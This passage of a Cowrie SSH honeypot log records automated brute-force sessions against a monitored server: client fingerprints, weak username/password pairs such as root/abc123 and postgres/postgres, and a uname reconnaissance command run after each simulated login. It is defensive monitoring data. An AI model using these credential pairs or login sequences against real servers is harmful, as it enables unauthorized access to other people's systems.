{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:38:10.480117Z","src_ip":"212.227.235.229","session":"de312b137d00"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:38:13.623255Z","src_ip":"212.227.125.160","session":"3907d4ab71fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60474,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7522cd952f6","protocol":"ssh","message":"New connection: 212.227.125.160:60474 (1.2.3.4:22) [session: d7522cd952f6]","sensor":"my-vps","timestamp":"2025-08-31T04:38:16.294789Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:38:16.295624Z","src_ip":"212.227.125.160","session":"d7522cd952f6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:38:16.479499Z","src_ip":"212.227.125.160","session":"d7522cd952f6"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abc123","message":"login attempt [oracle/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:38:16.497857Z","src_ip":"212.227.235.229","session":"de312b137d00"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123","message":"login attempt [root/abc123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:38:17.031155Z","src_ip":"212.227.125.160","session":"d7522cd952f6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:38:17.412314Z","src_ip":"212.227.125.160","session":"d7522cd952f6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:38:17.413155Z","src_ip":"212.227.125.160","session":"d7522cd952f6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:38:17.597538Z","src_ip":"212.227.125.160","session":"d7522cd952f6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:38:17.598703Z","src_ip":"212.227.125.160","session":"d7522cd952f6"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:38:18.273889Z","src_ip":"212.227.235.229","session":"de312b137d00"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres","message":"login attempt [postgres/postgres] failed","sensor":"my-vps","timestamp":"2025-08-31T04:38:24.927656Z","src_ip":"212.227.125.160","session":"0422cc68c7dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34660,"dst_ip":"1.2.3.4","dst_port":22,"session":"20f5d7bab1f1","protocol":"ssh","message":"New connection: 212.227.125.160:34660 (1.2.3.4:22) [session: 20f5d7bab1f1]","sensor":"my-vps","timestamp":"2025-08-31T04:38:30.358040Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:38:30.927377Z","src_ip":"212.227.125.160","session":"20f5d7bab1f1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:38:30.928223Z","src_ip":"212.227.125.160","session":"20f5d7bab1f1"}
{"eventid":"cowrie.session.connect","src_ip":"64.62.156.52","src_port":60480,"dst_ip":"1.2.3.4","dst_port":22,"session":"a08ab8cd767f","protocol":"ssh","message":"New connection: 64.62.156.52:60480 (1.2.3.4:22) [session: a08ab8cd767f]","sensor":"my-vps","timestamp":"2025-08-31T04:38:32.193716Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\xddK~X\\xa8\"\u0016\\x9d\\xcaw\\xcf_+ /7|\ue526E\\xfaq<\\xf0\u0013P\\xef\\xfb3-\\xbc\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\xddK~X\\xa8\"\u0016\\x9d\\xcaw\\xcf_+ /7|\ue526E\\xfaq<\\xf0\u0013P\\xef\\xfb3-\\xbc\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-31T04:38:32.195041Z","src_ip":"64.62.156.52","session":"a08ab8cd767f"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:38:32.196358Z","src_ip":"64.62.156.52","session":"a08ab8cd767f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52062,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0c2b0f44677","protocol":"ssh","message":"New connection: 212.227.125.160:52062 (1.2.3.4:22) [session: c0c2b0f44677]","sensor":"my-vps","timestamp":"2025-08-31T04:38:32.235531Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:38:32.236262Z","src_ip":"212.227.125.160","session":"c0c2b0f44677"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:38:32.425462Z","src_ip":"212.227.125.160","session":"c0c2b0f44677"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abc123","message":"login attempt [oracle/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:38:32.771727Z","src_ip":"212.227.125.160","session":"20f5d7bab1f1"}
{"eventid":"cowrie.login.failed","username":"tom","password":"123456","message":"login attempt [tom/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:38:32.993773Z","src_ip":"212.227.125.160","session":"c0c2b0f44677"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8158,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e9345b61f5a","protocol":"ssh","message":"New connection: 212.227.235.229:8158 (1.2.3.4:22) [session: 9e9345b61f5a]","sensor":"my-vps","timestamp":"2025-08-31T04:38:34.180001Z"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:38:34.184020Z","src_ip":"212.227.125.160","session":"c0c2b0f44677"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\x82\u0728\\xeb\u0015^8n\\xda>\\xc33\\xf4r\\xa7\\x8e\u001a\\x8e\u000feL\\xd0s@}l\\xd8u\\x9b\\xbc\\xaa\u0011\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\x82\u0728\\xeb\u0015^8n\\xda>\\xc33\\xf4r\\xa7\\x8e\u001a\\x8e\u000feL\\xd0s@}l\\xd8u\\x9b\\xbc\\xaa\u0011\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-31T04:38:34.202269Z","src_ip":"212.227.235.229","session":"9e9345b61f5a"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:38:34.204273Z","src_ip":"212.227.235.229","session":"9e9345b61f5a"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:38:34.316298Z","src_ip":"212.227.125.160","session":"20f5d7bab1f1"}
{"eventid":"cowrie.session.closed","duration":"67.9","message":"Connection lost after 67.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:38:34.941414Z","src_ip":"212.227.125.160","session":"0422cc68c7dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40912,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7161f7e954c","protocol":"ssh","message":"New connection: 212.227.125.160:40912 (1.2.3.4:22) [session: d7161f7e954c]","sensor":"my-vps","timestamp":"2025-08-31T04:38:37.512816Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:38:37.513698Z","src_ip":"212.227.125.160","session":"d7161f7e954c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:38:37.696532Z","src_ip":"212.227.125.160","session":"d7161f7e954c"}
{"eventid":"cowrie.login.success","username":"root","password":"Ab123456","message":"login attempt [root/Ab123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:38:38.246964Z","src_ip":"212.227.125.160","session":"d7161f7e954c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:38:39.083047Z","src_ip":"212.227.125.160","session":"d7161f7e954c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:38:39.083732Z","src_ip":"212.227.125.160","session":"d7161f7e954c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:38:39.267830Z","src_ip":"212.227.125.160","session":"d7161f7e954c"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:38:39.269033Z","src_ip":"212.227.125.160","session":"d7161f7e954c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48294,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5f801f548c3","protocol":"ssh","message":"New connection: 212.227.125.160:48294 (1.2.3.4:22) [session: d5f801f548c3]","sensor":"my-vps","timestamp":"2025-08-31T04:38:53.317289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:38:53.318244Z","src_ip":"212.227.125.160","session":"d5f801f548c3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:38:53.505328Z","src_ip":"212.227.125.160","session":"d5f801f548c3"}
{"eventid":"cowrie.login.success","username":"root","password":"Lol","message":"login attempt [root/Lol] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:38:53.864599Z","src_ip":"212.227.235.229","session":"9f6f74de9bc9"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres","message":"login attempt [postgres/postgres] failed","sensor":"my-vps","timestamp":"2025-08-31T04:38:53.954014Z","src_ip":"212.227.235.229","session":"a3c206da003f"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword","message":"login attempt [root/P@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:38:54.068854Z","src_ip":"212.227.125.160","session":"d5f801f548c3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:38:54.463144Z","src_ip":"212.227.125.160","session":"d5f801f548c3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:38:54.464033Z","src_ip":"212.227.125.160","session":"d5f801f548c3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:38:54.652440Z","src_ip":"212.227.125.160","session":"d5f801f548c3"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:38:54.653519Z","src_ip":"212.227.125.160","session":"d5f801f548c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49592,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f7d4dabb994","protocol":"ssh","message":"New connection: 212.227.125.160:49592 (1.2.3.4:22) [session: 5f7d4dabb994]","sensor":"my-vps","timestamp":"2025-08-31T04:38:54.731846Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59156,"dst_ip":"1.2.3.4","dst_port":22,"session":"496329c20404","protocol":"ssh","message":"New connection: 212.227.125.160:59156 (1.2.3.4:22) [session: 496329c20404]","sensor":"my-vps","timestamp":"2025-08-31T04:38:58.641641Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:38:58.642542Z","src_ip":"212.227.125.160","session":"496329c20404"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:38:58.829859Z","src_ip":"212.227.125.160","session":"496329c20404"}
{"eventid":"cowrie.login.failed","username":"user1","password":"123456","message":"login attempt [user1/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:38:59.400305Z","src_ip":"212.227.125.160","session":"496329c20404"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:39:00.590475Z","src_ip":"212.227.125.160","session":"496329c20404"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59202,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cd7c36a0477","protocol":"ssh","message":"New connection: 212.227.125.160:59202 (1.2.3.4:22) [session: 2cd7c36a0477]","sensor":"my-vps","timestamp":"2025-08-31T04:39:03.946875Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:39:03.948184Z","src_ip":"212.227.125.160","session":"2cd7c36a0477"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chac